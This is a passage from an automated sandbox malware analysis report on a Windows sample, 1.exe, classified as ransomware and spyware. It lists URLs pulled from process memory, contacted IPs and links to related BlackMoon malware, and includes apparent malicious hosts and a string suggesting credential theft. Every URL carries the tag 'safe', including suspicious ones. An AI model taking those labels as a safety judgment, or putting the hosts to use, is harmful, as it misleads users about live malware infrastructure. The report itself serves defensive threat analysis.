                                                                                                                http://vip.baxingfz.com//DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.GeeM2.comDC1FFAF.exe, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.ichuanglan.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.ih5.cn/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.netease.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.hichina.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://huadongcs.oss-accelerate.aliyuncs.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://vip.baxingfz.com/lllDC1FFAF.exe, 00000002.00000002.4686679559.00000000076D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.Haom6.comhttp://www.GeeM2.comWemadeDC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://yanzheng.appchizi.com/kss_io/io.php?v=13&b=1&s=10000002&e=get&line=1JDC1FFAF.exe, 00000002.00000002.4680189506.000000000651C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.solidot.org/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.m6dlq.com/DC1FFAF.exe, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://vip.baxingfz.com/http://baxing.1Rememberaccountusernameconfigpasswordclientidrandomstrwebdata1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.huawei.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://8090cqfz-1251514656.file.myqcloud.com/baxing.htm$DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://yanzheng.appchizi.com/kss_io/io.php?v=13&b=1&s=10000002)u6DC1FFAF.exe, 00000002.00000003.2402987601.0000000006543000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.youth.cn/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://119.29.29.29/d?dn=1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.yidianzixun.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.xunlei.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.GameM2.comDC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmUDC1FFAF.exe, 00000002.00000002.4718677174.0000000010560000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://www.96ydw.com/liebiao/88F410287F3C5C1A;fgDC1FFAF.exe, 00000002.00000002.4718677174.000000001057E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.imiker.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmRDC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://shanghaics.oss-accelerate.aliyuncs.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://ca800.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.bootcss.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.xitongzhijia.net/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://vip.baxingfz.com/.eDC1FFAF.exe, 00000002.00000002.4686679559.00000000076D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.eyuyan.comDC1FFAF.exe, 00000002.00000002.4716955883.0000000010412000.00000004.00000020.00020000.00000000.sdmp, BD950wrst.dll.2.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.ctrip.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://xinics.oss-accelerate.aliyuncs.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.php712EVTPSM.dll.2.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.7k7k.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.jdwx.info/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://vip.baxingfz.com/.lDC1FFAF.exe, 00000002.00000002.4675493919.0000000003E0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://115.28.91.235/api/fun.aspxname3jDC1FFAF.exe, 00000002.00000002.4769812740.0000000013F88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.yiche.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.baxingfz.comDC1FFAF.exe, 00000002.00000003.2241627746.0000000007778000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2393357552.0000000007178000.00000004.00000800.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2241627746.000000000776B000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2241627746.0000000007775000.00000004.00000020.00020000.00000000.sdmp, 0CPR6LBX.htm.2.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.i4.cn/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://aq.cqyanzheng.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://cs-g2-crl.thawte.com/ThawteCSG2.crl0DC1FFAF.exe, 00000002.00000002.4758545127.0000000012300000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2994885778.0000000012310000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.sys.2.dr, BC66DPQaf.sys.2.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://lusongsong.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmtDC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.m6dlq.com/PEC2DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.ipo.hk/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://xiaoman.cn/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmmDC1FFAF.exe, 00000002.00000002.4718677174.0000000010560000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://zhangjiakoucs.oss-accelerate.aliyuncs.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://8.218.87.7/DC1FFAF.exe, 00000002.00000002.4598653237.0000000000547000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://dcloud.net.cn/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown

                                                                                                                World Map of Contacted IPs

                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs

                                                                                                                Public IPs

                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                104.192.110.226
                                                                                                                		so.seos-lb.comUnited States
                                                                                                                		55992QIHOOBeijingQihuTechnologyCompanyLimitedCNfalse
                                                                                                                163.171.132.119
                                                                                                                		jd-abroad.cdn20.comEuropean Union
                                                                                                                		54994QUANTILNETWORKSUSfalse
                                                                                                                27.221.16.179
                                                                                                                		sinacloud.netChina
                                                                                                                		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                                                                103.107.217.26
                                                                                                                		multi-az-www-api.kuaishou.comChina
                                                                                                                		4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                                                                                                                163.181.42.239
                                                                                                                		unknownUnited States
                                                                                                                		24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                103.235.46.98
                                                                                                                		hao123.n.shifen.comHong Kong
                                                                                                                		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                                                                                                                60.221.222.1
                                                                                                                		opencdnqczjv6.jomodns.comChina
                                                                                                                		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                                                                103.235.46.96
                                                                                                                		www.wshifen.comHong Kong
                                                                                                                		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                                                                                                                161.117.242.93
                                                                                                                		ap-southeast-1-ds-2089.oss-acc.aliyuncs.comSingapore
                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                119.28.109.132
                                                                                                                		www.sogou.comChina
                                                                                                                		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                163.171.208.133
                                                                                                                		www.cctv.com.wsglb0.comEuropean Union
                                                                                                                		54994QUANTILNETWORKSUSfalse
                                                                                                                47.94.225.221
                                                                                                                		www.jmw.com.cnChina
                                                                                                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                163.181.92.231
                                                                                                                		www.eastmoney.com.w.cdngslb.comUnited States
                                                                                                                		24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                111.124.200.101
                                                                                                                		youdao.comChina
                                                                                                                		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                                                113.219.142.35
                                                                                                                		opencdnka.jomodns.comChina
                                                                                                                		63838CT-HUNAN-HENGYANG-IDCHengyangCNfalse
                                                                                                                49.51.65.181
                                                                                                                		sh2.general.proxy.sogou.comChina
                                                                                                                		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                43.152.186.117
                                                                                                                		unknownJapan4249LILLY-ASUSfalse
                                                                                                                43.159.118.238
                                                                                                                		www.tencent.com.acc.edgeonedy1.comJapan4249LILLY-ASUSfalse
                                                                                                                8.218.30.151
                                                                                                                		unknownSingapore
                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                43.154.89.236
                                                                                                                		vip.baxingfz.comJapan4249LILLY-ASUSfalse
                                                                                                                163.181.42.245
                                                                                                                		ww1.sinaimg.cn.w.alikunlun.comUnited States
                                                                                                                		24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                27.221.16.149
                                                                                                                		unknownChina
                                                                                                                		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                                                                163.181.160.235
                                                                                                                		www.douyin.com.queniuyk.comUnited States
                                                                                                                		24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                8.218.87.7
                                                                                                                		unknownSingapore
                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                163.181.92.232
                                                                                                                		unknownUnited States
                                                                                                                		24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                163.181.92.212
                                                                                                                		unknownUnited States
                                                                                                                		24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                47.242.126.205
                                                                                                                		unknownUnited States
                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                163.181.199.199
                                                                                                                		www.1688.com.danuoyi.tbcache.comUnited States
                                                                                                                		24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                45.194.34.250
                                                                                                                		g8450a5.usallient81.jiasula.vipSeychelles
                                                                                                                		328608Africa-on-Cloud-ASZAfalse
                                                                                                                8.212.11.147
                                                                                                                		unknownSingapore
                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                43.152.186.103
                                                                                                                		www.qq.com.eo.dnse2.comJapan4249LILLY-ASUSfalse
                                                                                                                120.26.110.170
                                                                                                                		foodmate.netChina
                                                                                                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                43.159.71.118
                                                                                                                		qt0t6l4k.e0.sched.ovscdns.comJapan4249LILLY-ASUSfalse
                                                                                                                43.132.81.173
                                                                                                                		dc3ee476.ovslegodl-dk.sched.ovscdns.comJapan4249LILLY-ASUSfalse
                                                                                                                47.254.187.183
                                                                                                                		eu-central-1-ds-2085.oss-acc.aliyuncs.comUnited States
                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                                                                                                                Private

                                                                                                                IP
                                                                                                                127.0.0.1

                                                                                                                General Information

                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                Analysis ID:1488636
                                                                                                                Start date and time:2024-08-06 10:28:13 +02:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 11m 1s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:11
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Sample name:1.exe
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.rans.spyw.evad.winEXE@10/29@103/36
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 75%
                                                                                                                • Number of executed functions: 173
                                                                                                                • Number of non-executed functions: 205
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                Warnings

                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 2.18.97.153, 104.126.37.186, 104.126.37.155, 96.17.180.185, 96.17.180.187, 104.102.63.40
                                                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, e15275.d.akamaiedge.net, www.iqiyiweb.akadns.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, wildcard.weather.microsoft.com.edgekey.net, e16604.g.akamaiedge.net, iqiyi.com.edgekey.net, prod.fs.microsoft.com.akadns.net, e99042.a.akamaiedge.net
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • VT rate limit hit for: 1.exe

                                                                                                                Simulations

                                                                                                                Behavior and APIs

                                                                                                                TimeTypeDescription
                                                                                                                04:29:12API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                04:29:49API Interceptor13562402x Sleep call for process: DC1FFAF.exe modified

                                                                                                                Joe Sandbox View / Context

                                                                                                                IPs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                104.192.110.2263.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                • www.so.com/
                                                                                                                1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • www.so.com/
                                                                                                                f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • www.so.com/
                                                                                                                f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                • www.so.com/
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • www.so.com/
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • www.so.com/
                                                                                                                d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                                • www.so.com/
                                                                                                                SecuriteInfo.com.Win32.Trojan.Kryptik.HK@susp.11565.26013.exeGet hashmaliciousUnknownBrowse
                                                                                                                • www.so.com/s?ie=utf-8&src=360se7_addr&q=%E5%BC%A0%E6%AF%85%E6%96%90
                                                                                                                163.171.132.1193.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                • www.jd.com/
                                                                                                                1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • www.jd.com/
                                                                                                                f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • www.jd.com/
                                                                                                                f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                • www.jd.com/
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • www.jd.com/
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • www.jd.com/
                                                                                                                d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                                • www.jd.com/
                                                                                                                test.apkGet hashmaliciousUnknownBrowse
                                                                                                                • www.estrongs.com/console/service/app_folder?v=175545&t=1
                                                                                                                test.apkGet hashmaliciousUnknownBrowse
                                                                                                                • www.estrongs.com/console/service/app_folder?v=175545&t=1

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                so.seos-lb.com3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                • 104.192.110.226
                                                                                                                1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • 104.192.110.226
                                                                                                                f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • 104.192.110.226
                                                                                                                f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.192.110.226
